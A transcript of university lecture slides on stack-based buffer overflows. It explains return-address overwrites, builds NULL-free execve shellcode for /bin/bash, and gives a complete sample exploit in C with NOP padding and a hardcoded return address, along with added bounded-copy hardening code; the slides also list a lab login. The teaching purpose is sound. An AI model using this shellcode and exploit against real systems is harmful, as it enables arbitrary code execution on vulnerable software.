
Stack-based buffer overflows



Presentation Transcript


  1. Stack-based buffer overflows
     Yves Younan
     DistriNet, Department of Computer Science
     Katholieke Universiteit Leuven, Belgium
     Yves.Younan@cs.kuleuven.ac.be

  2. Overview
  • Introduction
  • Buffer overflows
  • Stack-based buffer overflows
  • Shellcode
  • Code injection
  • Conclusion
  Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks

  3. Introduction
  • Buffer overflows: write outside the boundaries of an array
  • Can be used to overwrite adjacent memory
  • The stack contains control-flow related data, e.g. return addresses
  • Overwriting this data allows an attacker to execute new or existing code


  5. Buffer overflows (on IA32)
  • int main(int argc, char **argv) {
        int a;
        char buf[100];
        strcpy(buf, argv[1]);
    }
  • int a is allocated on the stack: 4 bytes
  • buf has memory allocated for 100 chars: 100 bytes
  • argv[1] can be longer than that, allowing an attacker to overwrite a in this example

  6. Buffer overflow on IA32
     High addr
       int a
       char buf[100]
     Low addr
     (buf lies below a; a copy that runs past the end of buf writes upward into a)


  8. Stack based buffer overflows
  • void f1(char *a) {
        char buffer[100];
        strcpy(buffer, a);
    }
  • void f0(char *b) {
        f1(b);
    }

  9. Stack-based buffer overflows
     Stack (high addresses at the top)

       Stack frame f0:
         Return address f0
         …
         Saved frame pointer f0
         Local variables f0
         …
         Arguments f1            (f0 calls f1)
       Stack frame f1:
         Return address f1       <- overwritten by the overflow; points into the injected code
         …
         Saved frame pointer f1
         buffer[]                <- the overflow starts here; the buffer holds the injected code

     Low addr
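As an added example that is not part of the slides, the hardened counterpart of the f1() shown above: the copy is bounded by the destination size, so the saved frame pointer and return address drawn in the stack frame can no longer be reached. The names bounded_copy, f1_checked and f1_checked_with_length are mine, not the author's.

```c
#include <stddef.h>
#include <string.h>

/* Added hardened form of the slide's f1(): the copy is bounded by the
 * destination size, the destination is always NUL-terminated, and input that
 * does not fit is rejected instead of being written past the end of the array.
 * Returns the number of bytes copied (excluding the NUL), or -1 on rejection. */
int bounded_copy(char *dst, size_t dstsz, const char *src)
{
    if (dstsz == 0)
        return -1;
    /* memchr stops at the first NUL and never looks past dstsz bytes of src,
     * so a huge or unterminated argument cannot make the length check itself
     * read out of bounds the way strlen() would. */
    const char *nul = memchr(src, '\0', dstsz);
    if (nul == NULL) {           /* no terminator within dstsz: cannot fit */
        dst[0] = '\0';           /* leave dst in a defined state */
        return -1;
    }
    size_t len = (size_t)(nul - src);
    memcpy(dst, src, len + 1);   /* payload plus its NUL */
    return (int)len;
}

/* Same frame as the slide's f1(): a 100-byte local buffer.  The saved frame
 * pointer and return address above it are out of reach because at most
 * 100 bytes (99 characters plus NUL) can ever be written into buffer[]. */
int f1_checked(const char *a)
{
    char buffer[100];
    return bounded_copy(buffer, sizeof buffer, a);
}

/* Test helper: hands f1_checked() an argument of n 'A' characters (n < 256). */
int f1_checked_with_length(size_t n)
{
    char arg[256];
    if (n >= sizeof arg)
        return -2;
    memset(arg, 'A', n);
    arg[n] = '\0';
    return f1_checked(arg);
}
```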


  11. Shellcode
  • Code to execute once the return address has been overwritten
  • Usually inserted into the buffer that is used to overflow
  • Some subtleties: a NULL byte will terminate a strcpy, a \n will terminate gets

  12. Example code
  • #include <unistd.h>
    int main() {
        char *argv[2];
        argv[0] = "/bin/bash";
        argv[1] = 0;
        execve(argv[0], argv, 0);
    }

  13. Example transformed to assembly
  • .type main,@function
    main:
        push $0x68          # Place "h" plus three NUL bytes on the stack (string terminator).
        push $0x7361622f    # Place "/bas" on the stack (little-endian 0x7361622f).
        push $0x6e69622f    # Place "/bin" on the stack (little-endian 0x6e69622f).
        mov  %esp,%ebx      # Copy the pointer to /bin/bash to ebx.
        xor  %edx,%edx      # Empty edx.
        push %edx           # Place a NULL on the stack to terminate the argv.
        push %ebx           # Place the pointer to /bin/bash on the stack.
        mov  %esp,%ecx      # Copy the pointer to the pointer to /bin/bash into ecx.
        mov  $0xb,%eax      # Let the syscall know we want execve.
        int  $0x80          # Do the system call.

  14. Shellcode
  • (gdb) x/27b main
    0x8048308 <main>:     0x6a 0x68 0x68 0x2f 0x62 0x61 0x73 0x68
    0x8048310 <main+8>:   0x2f 0x62 0x69 0x6e 0x89 0xe3 0x31 0xd2
    0x8048318 <main+16>:  0x52 0x53 0x89 0xe1 0xb8 0x0b 0x00 0x00
    0x8048320 <main+24>:  0x00 0xcd 0x80
  • The three 0x00 bytes at <main+22> to <main+24> are the upper bytes of the 32-bit immediate in mov $0xb,%eax; since a NULL byte terminates strcpy (slide 11), the copy would stop there and the int $0x80 would never arrive.

  15. Shellcode
  • .globl main
    .type main,@function
    main:
        push $0x68
        push $0x7361622f
        push $0x6e69622f
        mov  %esp,%ebx
        xor  %edx,%edx
        push %edx
        push %ebx
        mov  %esp,%ecx
        xor  %eax,%eax      # set %eax to 0
        mov  $0xb,%al       # copy 0xb into %al (least significant byte of %eax)
        int  $0x80
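An added check that is not part of the slides, making the slide 11 remark concrete: it reports how many leading bytes of a sequence a strcpy() (stops at 0x00) or gets() (stops at 0x0a) would actually transfer, run over the two encodings above. The byte values are the ones printed on slides 14 and 18; the function and array names are mine.

```c
#include <stddef.h>

/* Slide 14's 27-byte encoding: "mov $0xb,%eax" assembles to b8 0b 00 00 00. */
static const unsigned char sc_slide14[27] = {
    0x6a,0x68, 0x68,0x2f,0x62,0x61,0x73, 0x68,0x2f,0x62,0x69,0x6e,
    0x89,0xe3, 0x31,0xd2, 0x52, 0x53, 0x89,0xe1,
    0xb8,0x0b,0x00,0x00,0x00, 0xcd,0x80
};

/* Slide 18's 26-byte encoding: "xor %eax,%eax; mov $0xb,%al" is 31 c0 b0 0b. */
static const unsigned char sc_slide18[26] = {
    0x6a,0x68, 0x68,0x2f,0x62,0x61,0x73, 0x68,0x2f,0x62,0x69,0x6e,
    0x89,0xe3, 0x31,0xd2, 0x52, 0x53, 0x89,0xe1,
    0x31,0xc0, 0xb0,0x0b, 0xcd,0x80
};

/* Number of leading bytes of buf that a copying routine transfers before it
 * meets one of the byte values it treats as end of input.  Returns n when no
 * such byte occurs, i.e. the whole sequence arrives intact. */
size_t bytes_before_terminator(const unsigned char *buf, size_t n,
                               const unsigned char *stops, size_t nstops)
{
    for (size_t i = 0; i < n; i++)
        for (size_t j = 0; j < nstops; j++)
            if (buf[i] == stops[j])
                return i;
    return n;
}

/* The two copy primitives named on slide 11: strcpy() stops at 0x00,
 * gets() stops at 0x0a ('\n'). */
size_t bytes_copied_by_strcpy(const unsigned char *buf, size_t n)
{
    static const unsigned char stops[] = { 0x00 };
    return bytes_before_terminator(buf, n, stops, sizeof stops);
}

size_t bytes_copied_by_gets(const unsigned char *buf, size_t n)
{
    static const unsigned char stops[] = { 0x0a };
    return bytes_before_terminator(buf, n, stops, sizeof stops);
}

/* Slide 14's version: strcpy() stops at offset 22, so the syscall number's
 * upper bytes and the "int $0x80" never reach the destination buffer. */
size_t slide14_survives_strcpy(void) { return bytes_copied_by_strcpy(sc_slide14, sizeof sc_slide14); }

/* Slide 18's version: no 0x00 anywhere, so all 26 bytes are copied. */
size_t slide18_survives_strcpy(void) { return bytes_copied_by_strcpy(sc_slide18, sizeof sc_slide18); }
```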


  17. Sample vulnerable program
  • #include <string.h>
    void function(int a, char *b) {
        char string1[10];
        char string2[50];
        strcpy(string2, b);
    }
    int main(int argc, char **argv) {
        function(1, argv[1]);
    }

  18. Sample exploit
  • #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    char shellcode[] =
        "\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89"
        "\xe3\x31\xd2\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80";
    #define ADDR 0xbffffe2c
    int main() {
        char overflow[72];
        char *argv[3] = { "./bufferoverflow", overflow, NULL };
        memset(overflow, '\x90', 72);                  // fill with NOPs
        *(long *) &overflow[68] = ADDR;                // replace ret. addr.
        memcpy(overflow, shellcode, strlen(shellcode));
        execve(argv[0], argv, 0);                      // exec program
    }

  19. Conclusion
  • Follow “Gera’s Insecure Programming by example”:
    http://community.corest.com/~gera/InsecureProgramming/
  • Login/pass for the computers: cstudy/distrinet
